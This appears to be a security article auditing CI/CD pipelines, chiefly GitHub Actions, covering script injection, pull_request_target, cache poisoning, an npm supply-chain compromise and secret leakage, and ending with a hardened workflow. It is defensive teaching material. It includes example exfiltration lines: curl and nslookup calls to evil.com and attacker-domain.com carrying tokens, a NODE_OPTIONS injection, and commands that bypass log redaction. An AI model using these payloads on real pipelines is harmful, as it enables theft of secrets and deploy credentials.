Securing Your CI/CD Pipeline: A Systems Engineer's Audit
Your CI/CD pipeline has more attack surface than your application. It has your secrets, your signing keys, your deploy credentials, and it executes arbitrary code from the internet on every push. Here is a systems-level audit of every vector, with proof-of-concept demonstrations and a hardened workflow you can steal.
The uncomfortable truth: Most teams lock down their production servers and leave their CI/CD pipelines wide open. A compromised pipeline doesn't just leak secrets — it gives an attacker a signed, trusted path directly into production.
1. The Attack Surface
Before fixing anything, enumerate what you are defending. A modern CI/CD pipeline exposes at least seven distinct attack surfaces, each with its own threat model:
| Surface | What an Attacker Gets | Entry Vector |
|---|---|---|
| Dependencies | Arbitrary code execution at install time | Typosquatting, account takeover, malicious updates |
| Third-party actions/plugins | Full runner access, secret exfiltration | Compromised action repo, mutable tags |
| Workflow triggers | Code execution in privileged context | pull_request_target, issue_comment |
| Secrets & tokens | Cloud access, deploy keys, API tokens | Script injection, env var abuse, log exposure |
| Build cache | Persistent backdoor across builds | Cache key collision, poisoned artifacts |
| Artifacts | Tampered binaries shipped to users | Artifact substitution between jobs |
| Runner environment | Lateral movement, persistent compromise | Self-hosted runner escape, shared state |
Each of these surfaces is exploitable independently. A determined attacker will chain them. The sections that follow cover each one with concrete proof-of-concept demonstrations.
2. GitHub Actions Deep Dive
Building on Rafael Gonzaga's analysis of GitHub Actions security vectors, let's walk through the three most dangerous classes of vulnerability in GitHub Actions workflows.
Script injection via context expressions
GitHub Actions uses ${{ }} expressions to interpolate context values into workflow steps. When these expressions contain attacker-controlled input and are used in run: blocks, the result is direct shell injection. The dangerous fields include github.event.issue.title, github.event.pull_request.body, github.event.comment.body, and github.event.pull_request.head.ref.

    # VULNERABLE: PR title is attacker-controlled and interpolated into shell
    name: Check PR Title
    on: pull_request
    jobs:
      check:
        runs-on: ubuntu-latest
        steps:
          - name: Validate title
            run: |
              title="${{ github.event.pull_request.title }}"
              # An attacker sets the PR title to:
              #   a"; curl "http://evil.com/steal?t=$GITHUB_TOKEN" #
              #
              # The first quote closes the assignment, the rest runs as a command.
              # Result: secret exfiltration via command injection

The fix is to never interpolate user-controlled context directly into run: blocks. Pass the values through environment variables instead: the runner sets the variable before the script starts, so the shell reads the value as data and never parses it as script text:

    # SAFE: user input is passed as an environment variable, not interpolated
    steps:
      - name: Validate title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          # $PR_TITLE is a shell variable now, not subject to injection
          if [[ ! "$PR_TITLE" =~ ^[A-Za-z]+:\ .+$ ]]; then
            echo "Invalid PR title format"
            exit 1
          fi

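The difference can be reproduced on a workstation. The sketch below is a local simulation, not GitHub's runner: it pastes a hostile title into script text the way expression interpolation does, then passes the same kind of value through an environment variable. The payload, the marker file names, and the `make_payload` helper are invented for the demonstration, and the payload only touches a file in a temporary directory.

```shell
# Local simulation of interpolation vs. environment variables.
workdir=$(mktemp -d)

# make_payload MARKER: a hostile "PR title" that tries to create a marker file.
make_payload() {
  printf 'x"; touch "%s/%s"; echo "' "$workdir" "$1"
}

unsafe_title=$(make_payload interpolated)
safe_title=$(make_payload env)

# UNSAFE: the title becomes part of the script text before the shell parses it,
# so its quotes and semicolons are treated as code.
sh -c "title=\"$unsafe_title\"; echo checked" >/dev/null

# SAFE: the script text is fixed; the title arrives only as a variable value.
PR_TITLE=$safe_title sh -c 'title="$PR_TITLE"; echo checked' >/dev/null

if [ -e "$workdir/interpolated" ]; then echo "interpolated title: payload ran"; fi
if [ ! -e "$workdir/env" ]; then echo "env var title: payload stayed inert"; fi
```

Only the interpolated variant should leave a marker file behind, which is the whole argument for the `env:` pattern in miniature.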
The pull_request_target trap
The pull_request_target event is arguably the single most dangerous feature in GitHub Actions. Unlike pull_request, it runs in the context of the base branch, which means it has access to secrets and write permissions — even when triggered by a pull request from a fork. This is by design, but the implications are severe.
When a workflow triggered by pull_request_target checks out the PR's head code (as many do), it gives untrusted fork code access to the repository's secrets:

    # DANGEROUS: pull_request_target + checkout of PR code = secret exposure
    on: pull_request_target
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
            with:
              # This checks out the FORK's code, but secrets are available
              ref: ${{ github.event.pull_request.head.sha }}
          - run: npm install  # fork's package.json runs arbitrary postinstall scripts
          - run: npm test     # fork's test files can read ${{ secrets.DEPLOY_KEY }}

The safe pattern is to split this into two workflows. The first runs on pull_request (no secrets, no write access) and uploads results as artifacts. The second runs on workflow_run (has secrets) and consumes those artifacts after validation:

    # Step 1: Run untrusted code in a sandboxed context
    name: PR Build
    on: pull_request
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
          - run: npm ci && npm test
          - uses: actions/upload-artifact@v4
            with:
              name: test-results
              path: coverage/

    # Step 2: Consume results in a privileged context (separate workflow file)
    name: PR Comment
    on:
      workflow_run:
        workflows: ["PR Build"]
        types: [completed]
    jobs:
      comment:
        runs-on: ubuntu-latest
        if: github.event.workflow_run.conclusion == 'success'
        steps:
          - uses: actions/download-artifact@v4
            with:
              # Artifacts from another run need that run's ID and a token
              name: test-results
              run-id: ${{ github.event.workflow_run.id }}
              github-token: ${{ secrets.GITHUB_TOKEN }}
          # Validate artifact contents before using them

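What "validate artifact contents" means depends on the artifact, so the following is only a sketch of one plausible check for a coverage directory. The `validate_artifact` function, its allow-list of extensions, and the file limit are assumptions chosen for illustration; the idea is that the privileged workflow treats the download as hostile input until it passes.

```shell
# validate_artifact DIR: succeed only if DIR looks like plain coverage data.
# The allow-listed extensions and the file limit are illustrative assumptions.
validate_artifact() {
  artifact_dir=$1
  max_files=500

  # Symlinks could point outside the artifact directory.
  if [ -n "$(find "$artifact_dir" -type l | head -n 1)" ]; then
    echo "rejected: artifact contains a symlink" >&2
    return 1
  fi

  # Anything outside the expected report formats is treated as hostile.
  unexpected=$(find "$artifact_dir" -type f \
    ! -name '*.json' ! -name '*.xml' ! -name '*.info' ! -name '*.txt' | head -n 1)
  if [ -n "$unexpected" ]; then
    echo "rejected: unexpected file $unexpected" >&2
    return 1
  fi

  file_count=$(find "$artifact_dir" -type f | wc -l | tr -d ' ')
  if [ "$file_count" -gt "$max_files" ]; then
    echo "rejected: $file_count files exceeds limit of $max_files" >&2
    return 1
  fi
}

# Demonstration with throwaway directories.
good=$(mktemp -d)
printf '{"total": 87.5}\n' > "$good/coverage-summary.json"
bad=$(mktemp -d)
printf 'echo pwned\n' > "$bad/run.sh"

validate_artifact "$good" && echo "good artifact accepted"
validate_artifact "$bad" 2>/dev/null || echo "bad artifact rejected"
```

A check like this belongs before any step that parses, executes, or posts the artifact's contents.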
TOCTOU: Time-of-Check to Time-of-Use
This is a race condition that affects approval-based workflows. A maintainer reviews a PR and applies a "safe to test" label. The workflow triggers. But between the label being applied and the workflow executing, the PR author pushes a new commit with malicious code. The workflow runs the new code under the old approval.
As Gonzaga documents, this affects both pull_request_target and issue_comment triggers. The critical detail: pull_request.head.ref is mutable — it resolves to whatever the branch points to at execution time, not at trigger time.
The mitigation is to always pin to the immutable commit SHA:

    # VULNERABLE: head.ref resolves at execution time, not trigger time
    - uses: actions/checkout@v4
      with:
        ref: ${{ github.event.pull_request.head.ref }}

    # SAFE: head.sha is immutable, pinned to the reviewed commit
    - uses: actions/checkout@v4
      with:
        ref: ${{ github.event.pull_request.head.sha }}

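Scripts that decide what to check out can enforce the same rule defensively. A minimal sketch, assuming the ref reaches the script in a variable (`CHECKOUT_REF` is a hypothetical name, as is the `is_full_sha` helper): refuse anything that is not a full commit ID, so a branch name can never slip through.

```shell
# is_full_sha REF: succeed only if REF is a 40-character lowercase hex commit ID.
is_full_sha() {
  case $1 in
    *[!0-9a-f]*) return 1 ;;   # any other character means a branch or tag name
  esac
  [ "${#1}" -eq 40 ]
}

# CHECKOUT_REF is a hypothetical variable a workflow step would populate.
for CHECKOUT_REF in "feature/login" "11bd71901bbe5b1630ceea73d27597364c9af683"; do
  if is_full_sha "$CHECKOUT_REF"; then
    echo "ok to check out: $CHECKOUT_REF"
  else
    echo "refusing mutable ref: $CHECKOUT_REF"
  fi
done
```

The check is purely syntactic: it confirms the value is shaped like a commit ID, not that the commit is the one a maintainer reviewed.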
Environment variable injection
Several environment variables can hijack subsequent steps if an attacker can write to them. BASH_ENV is sourced before every bash step. NODE_OPTIONS can load arbitrary modules via --require. LD_PRELOAD injects shared libraries into every process. HTTPS_PROXY redirects all HTTPS traffic through an attacker-controlled proxy, enabling secret interception in transit.
If any workflow step writes to $GITHUB_ENV using untrusted input, all subsequent steps are compromised:

    # If an earlier step writes attacker-controlled data to GITHUB_ENV:
    echo "NODE_OPTIONS=--require=/tmp/evil.js" >> "$GITHUB_ENV"

    # Every subsequent step that runs Node.js will execute evil.js first.
    # This includes actions written in JavaScript (most of them).

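One way to reduce this risk is to route every write through a small guard instead of appending to the file directly. The sketch below is an assumption about how such a guard might look, not an official mechanism: `set_ci_env` and its deny-list are hypothetical, and the list is a starting point rather than a complete inventory of dangerous variables.

```shell
# set_ci_env NAME VALUE: append NAME=VALUE to the file named by $GITHUB_ENV,
# refusing names that alter how later steps execute and values that span lines.
set_ci_env() {
  name=$1
  value=$2
  case $name in
    BASH_ENV|ENV|NODE_OPTIONS|LD_PRELOAD|LD_LIBRARY_PATH|PATH|HTTP_PROXY|HTTPS_PROXY)
      echo "refusing sensitive variable: $name" >&2
      return 1 ;;
    ''|[0-9]*|*[!A-Za-z0-9_]*)
      echo "refusing invalid variable name" >&2
      return 1 ;;
  esac
  # A newline in the value would let it smuggle in a second NAME=VALUE line.
  newline_count=$(printf '%s' "$value" | wc -l | tr -d ' ')
  if [ "$newline_count" -ne 0 ]; then
    echo "refusing multi-line value for $name" >&2
    return 1
  fi
  printf '%s=%s\n' "$name" "$value" >> "$GITHUB_ENV"
}

# GitHub sets GITHUB_ENV on real runners; fall back to a temp file locally.
GITHUB_ENV=${GITHUB_ENV:-$(mktemp)}

set_ci_env BUILD_FLAVOR release && echo "BUILD_FLAVOR written"
set_ci_env NODE_OPTIONS '--require=/tmp/evil.js' 2>/dev/null || echo "NODE_OPTIONS blocked"
```

The newline check matters as much as the deny-list: a value containing a line break can define a second variable even when the first name is harmless.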
3. Supply Chain Attack: The "is" Package
As Sangchul Lee documented in his analysis of the npm "is" package supply chain attack, a single compromised utility package can expose the entire downstream ecosystem. This attack is a case study in how supply chain compromises actually work in practice, and why CI/CD pipelines are the primary blast radius.
The attack chain
The attack targeted maintainers of popular npm packages, including is, eslint-config-prettier, and chalk. The technique was a credential phishing campaign with surgical precision:
- Phishing: Maintainers received emails impersonating npm support from support@npmjs.org, directing them to npnjs (a typosquatted domain) with tracking tokens in the URL to identify each target.
- Token theft: The phishing page captured npm credentials. The attacker then created automation-type tokens, which critically bypass 2FA requirements for publishing.
- Malicious publish: The compromised is package v5.0.0 was published to the official npm registry with a weaponized postinstall hook.
The payload
The injected code used multiple layers of obfuscation to evade static analysis:

    {
      "name": "is",
      "version": "5.0.0",
      "scripts": {
        "postinstall": "node index.js"
      }
    }

This package.json is the entry point: the postinstall script triggers on npm install.
The index.js payload used the Function() constructor to dynamically generate and execute over 8,000 lines of obfuscated code in memory — avoiding filesystem writes that scanners would catch. Variable names were seeded with invisible Unicode characters (\u200C, zero-width non-joiner) to defeat grep-based detection. Variables named throw, require, and void with hidden characters made manual code review nearly impossible.
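Invisible characters defeat a search for visible text, but they are still bytes on disk and can be searched for directly. The sketch below assumes a grep that supports `-r` and `-a` (GNU and BSD grep both do) and looks for the UTF-8 encodings of three zero-width code points; `find_invisible_chars` and the sample files are made up for the demonstration.

```shell
# find_invisible_chars PATH...: print file:line:text for every line containing
# a zero-width character, matched by its UTF-8 byte sequence.
find_invisible_chars() {
  zwsp=$(printf '\342\200\213')   # U+200B zero-width space
  zwnj=$(printf '\342\200\214')   # U+200C zero-width non-joiner
  zwj=$(printf '\342\200\215')    # U+200D zero-width joiner
  LC_ALL=C grep -rnaF -e "$zwsp" -e "$zwnj" -e "$zwj" "$@"
}

# Demonstration: one file hides U+200C inside an identifier, one is clean.
sample=$(mktemp -d)
printf 'const th\342\200\214row = 1;\n' > "$sample/suspicious.js"
printf 'const value = 1;\n' > "$sample/clean.js"

find_invisible_chars "$sample"
```

Legitimate text in some scripts uses these code points, so a hit inside source code is a reason to look closer rather than proof of compromise.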
The deobfuscated payload performed the following:
- Credential harvesting: Read environment variables including AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, DATABASE_URL, and any variable matching common secret patterns
- System fingerprinting: Collected hostname, username, platform, architecture, and current working directory
- Dependency mapping: Read package.json, dependency trees, and npm scripts to identify high-value downstream targets
- C2 channel: Established a WebSocket connection to attacker infrastructure for real-time data exfiltration and remote command execution
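The credential-harvesting step is cheap to rehearse from the defender's side. As a rough sketch, the function below lists which variable names in the current environment would catch such a payload's eye; it prints names only, never values. The `exposed_secret_names` helper and its name pattern are assumptions, not the pattern the malware used.

```shell
# exposed_secret_names: list the names (never the values) of environment
# variables that look like credentials. The name pattern is a rough guess.
exposed_secret_names() {
  awk 'BEGIN { for (name in ENVIRON) print name }' |
    grep -E -i 'TOKEN|SECRET|PASSWORD|CREDENTIAL|_KEY|DATABASE_URL' |
    sort
}

# Demonstration in a subshell with two dummy credentials exported.
(
  export AWS_SECRET_ACCESS_KEY=dummy NPM_TOKEN=dummy
  exposed_secret_names
)
```

Running it as the first step of an install job shows what a lifecycle script in that job could read.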
Why CI/CD is the blast radius
This is where CI/CD pipelines become the critical amplifier. When npm install runs in your CI pipeline, the postinstall hook executes with access to every secret and environment variable available to the runner. A developer's laptop might have limited credentials. Your CI runner has deploy keys, cloud provider tokens, package publishing tokens, and database credentials. The attack referenced by GHSA-8mgj-vmr8-frr6 demonstrates this pattern.
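This is not theoretical. The is package had millions of downstream dependents. Every CI pipeline that ran npm install on a project whose dependency range admitted the malicious 5.0.0, with no lockfile holding it at an earlier version, executed the payload in a privileged context. A caret range such as is@^4.0.0 would not have picked it up, because caret ranges never cross a major version; the exposed projects were those on open ranges such as >=4.0.0 or *, and those that upgraded to 5.x.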
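Whether a declared range admits a given release can be checked mechanically. Under node-semver rules, a caret range on a 1.x-or-later version admits anything at or above the base version and below the next major. The sketch below implements only that case; `semver_part` and `caret_allows` are illustrative helpers, and prerelease tags and the special 0.x rules are deliberately left out.

```shell
# semver_part VERSION INDEX: print one numeric field (1=major, 2=minor, 3=patch).
semver_part() {
  printf '%s\n' "$1" | cut -d. -f"$2"
}

# caret_allows BASE VERSION: succeed when VERSION satisfies ^BASE.
# Handles plain MAJOR.MINOR.PATCH with MAJOR >= 1 only.
caret_allows() {
  base_major=$(semver_part "$1" 1)
  base_minor=$(semver_part "$1" 2)
  base_patch=$(semver_part "$1" 3)
  major=$(semver_part "$2" 1)
  minor=$(semver_part "$2" 2)
  patch=$(semver_part "$2" 3)

  [ "$major" -eq "$base_major" ] || return 1   # never crosses a major version
  [ "$minor" -gt "$base_minor" ] && return 0
  [ "$minor" -eq "$base_minor" ] && [ "$patch" -ge "$base_patch" ]
}

for candidate in 4.0.0 4.9.3 5.0.0; do
  if caret_allows 4.0.0 "$candidate"; then
    echo "^4.0.0 admits $candidate"
  else
    echo "^4.0.0 rejects $candidate"
  fi
done
```

A lockfile installed with npm ci narrows exposure further, because the resolved version is fixed until someone deliberately updates it.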
4. Cache Poisoning
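GitHub Actions caches are scoped to a branch but accessible by child branches. The default branch's cache is accessible to all branches. This creates a poisoning vector: an attacker who can write to a cache scope that other builds read from, most damagingly the default branch's, can inject malicious content that persists across builds. Caches written by an ordinary pull_request run stay scoped to that pull request, so the realistic entry points are workflows that execute attacker-influenced code in the default branch's scope, such as pull_request_target or workflow_run.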
The attack
Consider a workflow that caches node_modules or compiled binaries. The cache action trusts whatever was saved under a key; it does not check that the contents match the files the key was derived from. An attacker who can run code in a job with access to the target cache scope can therefore save a trojaned dependency tree under the exact key, or under a restore-key prefix, that later builds will request:

    # Typical cache configuration
    - uses: actions/cache@v4
      with:
        path: node_modules
        # Cache key is based on lockfile hash; attacker controls this
        key: node-${{ hashFiles('package-lock.json') }}

    # Attack: modify package-lock.json to resolve a dependency
    # to a registry the attacker controls, then revert the change
    # after the cache is populated. Subsequent builds use the
    # poisoned node_modules from cache.

Proof of concept: cache key manipulation
The more subtle attack targets restore keys. When an exact cache key miss occurs, GitHub Actions falls back to prefix-matched restore keys. An attacker can populate a cache entry with a carefully chosen key that matches a restore-key prefix used by the main branch:

    # Main branch workflow uses:
    key: build-${{ hashFiles('src/**') }}
    restore-keys: |
      build-

    # Attacker code running in a scope that main can read (for example a
    # pull_request_target job) saves a cache entry with key "build-aaaa...",
    # which matches the restore-key prefix "build-".
    # When main has no exact key hit, it restores the most recently
    # created entry matching the prefix: the poisoned one.

Mitigations
- Scope caches tightly: Include runner.os, exact Node/Python version, and a hash of lockfiles in the cache key
- Never cache executable outputs: Cache dependencies, not compiled binaries. Rebuild from source in every CI run
- Use immutable caches: GitHub's cache is immutable once written (same key cannot be overwritten), but restore-key fallback undermines this. Minimize restore-key breadth
- Verify cache integrity: Checksum cached artifacts before using them
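The integrity check in the last item can be sketched with standard tools. This version assumes GNU coreutils (`sha256sum`, as found on Ubuntu runners) and assumes the manifest is kept somewhere the cache writer cannot modify; a manifest stored inside the cache itself would prove nothing. The function names are illustrative.

```shell
# write_manifest DIR MANIFEST: record a sorted list of SHA-256 digests for DIR.
write_manifest() {
  (cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2) > "$2"
}

# verify_manifest DIR MANIFEST: succeed only if DIR still matches MANIFEST
# exactly; added, removed, and modified files all cause a mismatch.
verify_manifest() {
  fresh_manifest=$(mktemp)
  write_manifest "$1" "$fresh_manifest"
  cmp -s "$fresh_manifest" "$2"
}

# Demonstration: record a manifest, then tamper with the "cached" directory.
cache_dir=$(mktemp -d)
manifest=$(mktemp)
printf 'module.exports = 1;\n' > "$cache_dir/index.js"
write_manifest "$cache_dir" "$manifest"

verify_manifest "$cache_dir" "$manifest" && echo "cache matches manifest"
printf 'require("child_process");\n' >> "$cache_dir/index.js"
verify_manifest "$cache_dir" "$manifest" || echo "cache modified: rebuild from source"
```

Regenerating and comparing the whole manifest, rather than checking only the listed files, is what catches files an attacker adds.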
5. Secret Management: What Leaks and How
GitHub Actions redacts secrets from logs, but this redaction is best-effort, not guaranteed. There are multiple documented paths to secret exfiltration.
Exfiltration vectors
| Vector | Mechanism | Mitigation |
|---|---|---|
| Base64 encoding | echo $SECRET \| base64 produces output the redactor does not match | Restrict GITHUB_TOKEN permissions per job |
| Character splitting | Print secret one character at a time; redactor only matches full strings | Use OIDC tokens instead of long-lived secrets |
| DNS exfiltration | nslookup $SECRET.evil.com sends the secret as a DNS subdomain query | Network egress controls on self-hosted runners |
| Artifact upload | Write secrets to a file, upload as build artifact | Never use secrets.* in artifact paths or content |
| Error messages | Secrets in command arguments appear in error output before redaction | Pass secrets via environment variables, not CLI args |
Proof of concept: log redaction bypass

    # GitHub redacts exact matches of secrets in logs.
    # These transformations defeat redaction:

    # 1. Base64 encode (printf avoids encoding echo's trailing newline)
    printf '%s' "$SECRET" | base64
    # Output: c2VjcmV0dmFsdWU= (not redacted)

    # 2. Hex encode
    printf '%s' "$SECRET" | xxd -p
    # Output: 736563726574... (not redacted)

    # 3. Reverse the string
    echo "$SECRET" | rev
    # Output: eulavterces (not redacted)

    # 4. DNS exfiltration: no log output at all
    nslookup "$SECRET.attacker-domain.com"
    # Secret transmitted via DNS query, no log trace

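The weakness is structural, and a toy masker shows why. The sketch below is a simplified stand-in for exact-match redaction, not GitHub's implementation: `redact_log` replaces literal occurrences of one secret and nothing else, so any reversible transformation of the secret passes through untouched. The secret is a dummy value.

```shell
# redact_log SECRET: copy stdin to stdout, replacing exact occurrences of
# SECRET with ***. A simplified stand-in for a log masker.
redact_log() {
  SECRET_TO_MASK=$1 awk '
    BEGIN { secret = ENVIRON["SECRET_TO_MASK"] }
    secret == "" { print; next }
    {
      line = $0; masked = ""
      while ((pos = index(line, secret)) > 0) {
        masked = masked substr(line, 1, pos - 1) "***"
        line = substr(line, pos + length(secret))
      }
      print masked line
    }'
}

SECRET='secretvalue'   # dummy value for the demonstration
{
  echo "plain:  $SECRET"
  echo "base64: $(printf '%s' "$SECRET" | base64)"
  echo "hex:    $(printf '%s' "$SECRET" | od -An -tx1 | tr -d ' \n')"
} | redact_log "$SECRET"
```

Only the plain line is masked. A masker that also covered base64 and hex would still miss the next encoding, which is why the mitigations in the table focus on limiting what a secret can do rather than on hiding it.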
The GITHUB_TOKEN problem
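Under the permissive default setting, which older repositories and organizations may still carry, GITHUB_TOKEN has write access to the repository's contents, pull requests, issues, and packages. Most workflows need a small fraction of these permissions. Whatever the account-level default is, always restrict the token to the minimum required scope in the workflow itself: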

    # Lock down GITHUB_TOKEN at the workflow level
    permissions:
      contents: read
      pull-requests: read
      issues: none
      packages: none

    # Override per-job only where needed
    jobs:
      deploy:
        permissions:
          contents: read
          id-token: write  # for OIDC

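Finding the workflows that still rely on the account default is a one-function job. The sketch below assumes workflows live in a single directory and treats a `permissions:` key starting in column 1 as the workflow-level block; `workflows_without_permissions` is an illustrative name, and the check is textual rather than a real YAML parse.

```shell
# workflows_without_permissions DIR: print workflow files in DIR that lack a
# top-level "permissions:" key (one that starts in column 1).
workflows_without_permissions() {
  for workflow_file in "$1"/*.yml "$1"/*.yaml; do
    [ -f "$workflow_file" ] || continue
    grep -q '^permissions:' "$workflow_file" || printf '%s\n' "$workflow_file"
  done
}

# Demonstration with two throwaway workflow files.
workflows_dir=$(mktemp -d)
printf 'name: locked\npermissions:\n  contents: read\njobs: {}\n' > "$workflows_dir/locked.yml"
printf 'name: open\njobs:\n  build:\n    permissions:\n      contents: read\n' > "$workflows_dir/open.yml"

workflows_without_permissions "$workflows_dir"
```

In a real repository the argument would be `.github/workflows`. A file that sets permissions only per job is still reported, since any job added later would inherit the default.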
6. Platform Comparison: Security Models
GitHub Actions is the most popular CI/CD platform, but it is not the only option, and its security model has specific weaknesses that alternatives address differently. Here is a factual comparison of security-relevant features across three major platforms.
| Feature | GitHub Actions | GitLab CI | Buildkite |
|---|---|---|---|
| Fork PR secret access | Secrets hidden from forks by default, but pull_request_target bypasses this | Protected variables excluded from forks; merge request pipelines run in fork context | No fork concept; pipelines only run from trusted repos |
| Runner isolation | GitHub-hosted: ephemeral VMs. Self-hosted: persistent, shared state between jobs | Shared runners use Docker isolation. Can enforce tagged runners per project | Agent-based; supports ephemeral agents, Kubernetes pods, and locked-down AMIs |
| Secret scoping | Organization, repository, or environment-level. Environment secrets require approval rules | Group, project, or environment-level. Protected variables restricted to protected branches | Agent-level or pipeline-level. Secrets injected by agent, not stored in pipeline config |
| OIDC support | Native id-token permission for cloud provider auth without long-lived secrets | Native id_tokens keyword for cloud auth (replaces the deprecated CI_JOB_JWT variables). Supports OIDC with AWS, GCP, Azure | Supported via plugins; less native than GitHub/GitLab |
| Immutable pipeline config | Workflows defined in repo; any committer can modify. Branch protection rules help but require careful setup | Pipeline config in repo but include: can reference locked templates from compliance repos | Pipeline config stored on Buildkite servers; repo contains .buildkite/ but agent config is separate |
| Audit logging | Enterprise plan only for detailed audit logs | Audit events available on Premium/Ultimate tiers | Full audit log on all plans |
Key architectural differences
GitHub Actions conflates pipeline definition and code in the same repository. Any contributor with write access can modify .github/workflows/. This means a compromised developer account or a malicious insider can alter the pipeline itself.
GitLab CI addresses this partially with include: templates. A security team can maintain a locked-down pipeline template in a separate repository, and project pipelines include it. Changes to the template require separate access controls.
Buildkite takes a fundamentally different approach: the pipeline definition lives on the Buildkite server, not in the repository. The agent pulls the pipeline steps from Buildkite's API, not from the repo. This means an attacker who compromises the source repo cannot modify the pipeline without also compromising the Buildkite account.
7. Signing & Provenance: The Defense Stack
Detection and prevention are necessary but insufficient. The final layer is cryptographic proof that what you built is what you ship, and that it was built by who you think built it.
SLSA (Supply-chain Levels for Software Artifacts)
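SLSA's original v0.1 specification defined four levels of supply chain integrity, shown below. The current v1.0 specification retains Build Levels 1 through 3 and drops the former Level 4 requirements from the build track. Most organizations should target SLSA Level 3, which requires a hardened build platform that generates non-forgeable provenance: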
| Level | Requirements | What It Proves |
|---|---|---|
| SLSA 1 | Build process is documented | Origin of the package is recorded |
| SLSA 2 | Version-controlled build definition, hosted build service | Build was not modified after check-in |
| SLSA 3 | Hardened build platform, non-forgeable provenance | Build is tamper-resistant; provenance is cryptographically verified |
| SLSA 4 (v0.1 only) | Two-party review, hermetic builds | No insider threat; build is fully reproducible |
Sigstore: Keyless signing for CI/CD
Sigstore eliminates the key management problem. Instead of managing long-lived signing keys (which become another secret to protect), it uses OIDC identity from your CI provider to issue short-lived certificates via the Fulcio certificate authority. Signatures are recorded in the Rekor transparency log for public auditability.

    # Sign a container image in GitHub Actions using Sigstore cosign
    jobs:
      sign:
        runs-on: ubuntu-latest
        permissions:
          id-token: write  # required for OIDC token
          packages: write  # required to push signature
        steps:
          # Assumes an earlier step with id "build" in this job pushed the
          # image and exposed its digest as an output; registry login omitted.
          - uses: sigstore/cosign-installer@v3
          - run: |
              cosign sign --yes \
                ghcr.io/myorg/myimage@${{ steps.build.outputs.digest }}

    # No keys to manage. OIDC identity from GitHub Actions
    # is used to obtain a short-lived Fulcio certificate.
    # The signature is recorded in the Rekor transparency log.

npm provenance
Since npm v9.5.0, packages can be published with provenance statements that cryptographically link a published package to its source repository and build workflow. A release pushed with a stolen token from outside that workflow, as in the is package compromise, carries no such statement, which gives consumers a signal to check for:

    # Publish with provenance: links the package to its source commit and workflow
    # (the job needs "id-token: write" permission to mint the OIDC token)
    steps:
      - run: npm publish --provenance
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

    # Consumers can verify provenance:
    #   npm audit signatures
    # This verifies the package was built from the claimed source repo
    # and the claimed CI workflow, not from an attacker's laptop.

8. Hardened Pipeline Template
Below is a complete GitHub Actions workflow that implements the workflow-level mitigations discussed in this post. Copy it, adapt it to your stack, and use it as a baseline.

    # .github/workflows/ci-hardened.yml
    # Hardened CI pipeline: every mitigation in one place
    name: CI (Hardened)

    on:
      push:
        branches: [main]
      pull_request:
        branches: [main]

    # 1. Restrict GITHUB_TOKEN to minimum permissions at workflow level
    permissions:
      contents: read

    jobs:
      build:
        runs-on: ubuntu-latest
        timeout-minutes: 15  # 2. Prevent runaway jobs (crypto miners, etc.)
        steps:
          # 3. Pin actions to full commit SHAs, not mutable tags
          - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
            with:
              persist-credentials: false  # 4. Don't leave git credentials on disk

          - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af # v4.1.0
            with:
              node-version: '22'

          # 5. Use npm ci, not npm install: it installs exactly what the lockfile
          #    records. The --ignore-scripts flag is what skips lifecycle scripts;
          #    npm ci on its own still runs them.
          - run: npm ci --ignore-scripts

          # 6. Re-run install scripts only for dependencies you have vetted.
          #    A bare "npm rebuild" would run them for every package.
          #    (esbuild is a placeholder; list your own allow-listed packages.)
          - run: npm rebuild esbuild

          # 7. Audit dependencies for known vulnerabilities
          - run: npm audit --audit-level=high

          # 8. Run tests
          - run: npm test

          # 9. Upload artifacts with minimal retention
          - uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4.4.3
            if: always()
            with:
              name: test-results
              path: coverage/
              retention-days: 5

      deploy:
        needs: build
        runs-on: ubuntu-latest
        if: github.ref == 'refs/heads/main'
        timeout-minutes: 10
        # 10. Use environment with required reviewers for production deploy
        environment: production
        # 11. Per-job permissions: only what deploy needs
        permissions:
          contents: read
          id-token: write  # 12. OIDC for cloud auth, no long-lived secrets
        steps:
          - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
            with:
              persist-credentials: false

          # 13. Authenticate via OIDC, not stored credentials
          - uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502 # v4.0.2
            with:
              role-to-assume: arn:aws:iam::123456789012:role/deploy  # placeholder account ID
              aws-region: us-east-1

          - run: ./scripts/deploy.sh

The numbered comments correspond to specific mitigations. Every line has a reason. If you remove a line, know which threat you are accepting.
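Mitigation 3 is the easiest one to regress, because a single new `uses:` line with a tag undoes it. The sketch below is one possible check, assuming a grep with `-E` and `-H` support: it prints every action reference that is not pinned to a 40-character commit SHA and skips local `./` actions. The function name and the sample workflow are illustrative.

```shell
# list_unpinned_actions FILE...: print file:line:text for every "uses:" entry
# that is not pinned to a 40-character commit SHA. Local ./ actions are skipped.
# Exit status is 0 when something unpinned was found, 1 when everything is pinned.
list_unpinned_actions() {
  grep -nH -E '^[[:space:]]*(-[[:space:]]*)?uses:[[:space:]]' "$@" |
    grep -v -E 'uses:[[:space:]]*[^[:space:]#]+@[0-9a-f]{40}([[:space:]]|$)' |
    grep -v -E 'uses:[[:space:]]*\./'
}

# Demonstration with a throwaway workflow fragment.
workflow=$(mktemp)
cat > "$workflow" <<'EOF'
steps:
  - uses: actions/checkout@v4
  - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af # v4.1.0
  - uses: ./.github/actions/local-build
EOF

list_unpinned_actions "$workflow"
```

Only the `actions/checkout@v4` line should be reported. In a CI job the exit status has to be inverted, since a match here means the check failed.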
9. Takeaways: Prioritized Checklist
In order of impact and ease of implementation:
- Pin all actions to commit SHAs. A mutable tag (@v4) can be force-pushed by a compromised action maintainer. A commit SHA is immutable. This is the single highest-leverage change you can make.
- Set permissions: at the workflow level. Default to contents: read and override per job. This limits blast radius if any step is compromised.
- Never interpolate user input into run: blocks. Use environment variables. This eliminates the entire class of script injection attacks.
- Replace pull_request_target with pull_request + workflow_run. If you must use pull_request_target, never check out the PR's code.
